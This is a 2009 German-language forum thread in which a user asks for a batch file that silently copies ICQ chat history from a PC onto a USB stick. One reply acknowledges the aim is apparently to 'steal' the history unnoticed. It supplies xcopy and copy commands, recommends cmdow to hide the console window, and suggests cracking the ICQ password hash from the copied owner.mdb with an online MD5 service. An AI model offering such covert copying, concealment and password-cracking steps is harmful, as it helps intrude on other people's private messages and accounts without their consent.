|
| Batch-datei-Code für die Kopie der ICQ-History | |
Jule
|
Verfasst am: 11.11.2009, 11:05 |
|
|
|
Hallo zusammen,
ich suche schon länger einen richtigen Code für ein Prgramm. Ich habe mir überlegt ob es gehen würde, dass ich eine Datei (.exe ; .batch) so programmiere, dass wenn man sie startet(von einem USB-Stick), die messages.mdb also die History von ICQ, auf meinen USB-Stick kopiert wird.
Auf gut Deutsch: Datei ausführen - messages.mdb auf dem USB-Stick, von der die Datei gestartet wurde.
Ist sowas möglich? Bin schon nämlich schon eine ganze Weile an der Sache dran, bekomme eaber einfach nichts hin
liebe grüße
Jule
|
|
| | |
| | |
ERROR
|
Verfasst am: 11.11.2009, 13:42 |
|
|
|
also du könntest dir natürlich den ganzen persönlichen Ordner kopieren, z. B.
xcopy "%AppData%\ICQ\*.*" "ZIEL\" /E /C /G /H /Q /K /Y /I
im ZIEL Verzeichniss ist dann der Ordner mit der entsprechenden Nummer, in dem dann die messages.mdb ist.
Für mich klingt das außerdem so, als wenn du den Verlauf "klauen" willst, ohne dass man es merkt. In diesem Fall kann ich dir cmdow.exe empfehlen http://www.commandline.co.uk/cmdow/
Dann musst du einfach die heruntergeladene cmdow.exe in den Ordner, in dem die *.bat ist ziehen und in die *.bat als erste Zeile
cmdow.exe C:\Windows\system32\cmd.exe /HID
einfügen.
praktischer Nebeneffekt wenn du den ganzen Ordner mit der Nummer kopierst: du hast die owner.mdb auch dabei, die du mit dem ICQ Passwort Hasher später ganz in Ruhe auslesen und z. B. mit http://md5cracker.org/ entschlüseln kannst.
mfg
|
|
| | |
| | |
| | |
| | |
| | |
Bibber
|
Verfasst am: 13.11.2009, 07:19 |
|
|
|
ERROR hat Folgendes geschrieben: | bei den accs von meinen Freunden, die ihr passwort vergessen haben hat's immer funktioniert. |
Dann haben deine Freunde aber ziemlich unsichere Passwörter, denn normalerweise kannst du das bei 6-8 Zeichen schon vergessen. Bei Beachtung von Groß-/Kleinschreibung + Zahlen (ohne Sonderzeichen) kommt man bei einem 6-stelligen Passwort schon auf knappe 50 Billionen Möglichkeiten. Solche großen Hashtabellen hat kein Mensch. Treffer damit so gut wie unmöglich ... außer man benutzt irgendwelche gängigen einfachen Wörter oder Zahlenkombinationen. Deine Freunde sollten sich wirklich Gedanken machen.
Zum Thema:
xcopy ist unnötig wenn man nur eine einzelne Datei kopieren will ... vor allem die ganzen Parameter.
Folgender Befehl reicht völlig aus um die Messages.mdb in den gleichen Ordner wie die Batch-Datei zu kopieren:
@echo off
copy "%AppData%\ICQ\123456789\Messages.mdb" "%~dp0" /Y |
|
|
| | |
| | |
Jule
|
Verfasst am: 13.11.2009, 19:03 |
|
|
|
hab jetzt mal beide codes so übernommen wie sie dranstanden, ohne Angabe des Laufwerks oder einer anderen Zuordnung.
Da geht immer das DOS-Fenster für kurze Zeit auf, aber die Datei/Ordner wird leider nicht verschoben...
hab ne Weile rummversucht, leider ohne Erfolg (bissher)
|
|
| | |
Du kannst keine Beiträge in dieses Forum schreiben. Du kannst auf Beiträge in diesem Forum nicht antworten. Du kannst deine Beiträge in diesem Forum nicht bearbeiten. Du kannst deine Beiträge in diesem Forum nicht löschen. Du kannst an Umfragen in diesem Forum nicht mitmachen.
|
Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 2
|
|
|
| |